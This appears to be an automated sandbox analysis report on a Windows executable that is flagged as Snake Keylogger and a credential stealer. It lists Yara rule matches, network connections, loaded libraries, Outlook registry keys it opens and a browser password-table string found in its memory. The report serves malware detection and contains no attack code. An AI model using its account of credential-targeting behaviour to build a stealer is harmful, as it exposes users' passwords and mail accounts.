Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49720 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Zarefy4bOs.exe, type: SAMPLE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Zarefy4bOs.exe, type: SAMPLE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Zarefy4bOs.exe, type: SAMPLE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Zarefy4bOs.exe, type: SAMPLE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\Zarefy4bOs.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266B388	0_2_0266B388
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02666168	0_2_02666168
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266C1F0	0_2_0266C1F0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_026621A8	0_2_026621A8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266C7B2	0_2_0266C7B2
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02666790	0_2_02666790
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266C4D0	0_2_0266C4D0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266FA10	0_2_0266FA10
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266CA92	0_2_0266CA92
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02664B31	0_2_02664B31
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_026698B8	0_2_026698B8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266BF10	0_2_0266BF10
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266EDF0	0_2_0266EDF0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266E300	0_2_0266E300
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266E310	0_2_0266E310
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266305E	0_2_0266305E
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_026630F6	0_2_026630F6
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266B552	0_2_0266B552
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_026635CA	0_2_026635CA
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0266BC32	0_2_0266BC32
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02768278	0_2_02768278
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02767988	0_2_02767988
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02763688	0_2_02763688
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02760D60	0_2_02760D60
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276DA18	0_2_0276DA18
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02767200	0_2_02767200
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276DA09	0_2_0276DA09
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276B2EF	0_2_0276B2EF
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276E2C8	0_2_0276E2C8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276E2B8	0_2_0276E2B8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276EB78	0_2_0276EB78
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276EB68	0_2_0276EB68
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276B300	0_2_0276B300
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276BBB0	0_2_0276BBB0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276BBA0	0_2_0276BBA0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02767BA8	0_2_02767BA8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276F871	0_2_0276F871
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02760040	0_2_02760040
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02760007	0_2_02760007
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276C008	0_2_0276C008
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_027608F1	0_2_027608F1
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276C8B8	0_2_0276C8B8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276C8A8	0_2_0276C8A8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276F880	0_2_0276F880
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276D168	0_2_0276D168
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276D158	0_2_0276D158
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02760900	0_2_02760900
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_027671FC	0_2_027671FC
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_027681FC	0_2_027681FC
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276DE70	0_2_0276DE70
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02763678	0_2_02763678
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276DE61	0_2_0276DE61
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276B752	0_2_0276B752
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276B758	0_2_0276B758
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276E720	0_2_0276E720
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276E710	0_2_0276E710
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276BFF8	0_2_0276BFF8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276EFD0	0_2_0276EFD0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276EFC1	0_2_0276EFC1
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276C460	0_2_0276C460
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276C450	0_2_0276C450
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276F428	0_2_0276F428
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276F418	0_2_0276F418
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276ACDE	0_2_0276ACDE
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_027604A0	0_2_027604A0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02760490	0_2_02760490
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_02760D50	0_2_02760D50
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276CD10	0_2_0276CD10
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276CD01	0_2_0276CD01
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276D5C0	0_2_0276D5C0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 0_2_0276D5B0	0_2_0276D5B0

Source: Zarefy4bOs.exe, 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Zarefy4bOs.exe
Source: Zarefy4bOs.exe, 00000000.00000002.4457793931.00000000005D7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Zarefy4bOs.exe
Source: Zarefy4bOs.exe, 00000000.00000002.4458012480.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Zarefy4bOs.exe
Source: Zarefy4bOs.exe	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Zarefy4bOs.exe

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Section loaded: dpapi.dll	Jump to behavior

Source: Zarefy4bOs.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Zarefy4bOs.exe, type: SAMPLE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Zarefy4bOs.exe, type: SAMPLE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Zarefy4bOs.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Zarefy4bOs.exe, type: SAMPLE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: Zarefy4bOs.exe, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Zarefy4bOs.exe, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Zarefy4bOs.exe, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Zarefy4bOs.exe, ----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.winEXE@1/0@4/4

Source: C:\Users\user\Desktop\Zarefy4bOs.exe

Mutant created: NULL

Source: Zarefy4bOs.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Zarefy4bOs.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\Zarefy4bOs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Zarefy4bOs.exe, 00000000.00000002.4462765231.000000000390B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002B14000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Zarefy4bOs.exe	ReversingLabs: Detection: 65%
Source: Zarefy4bOs.exe	Virustotal: Detection: 67%

Source: Zarefy4bOs.exe

String found in binary or memory: F-Stopw

Source: C:\Users\user\Desktop\Zarefy4bOs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Zarefy4bOs.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Zarefy4bOs.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Memory allocated: DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Memory allocated: 2880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Memory allocated: DD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599234	Jump to behavior
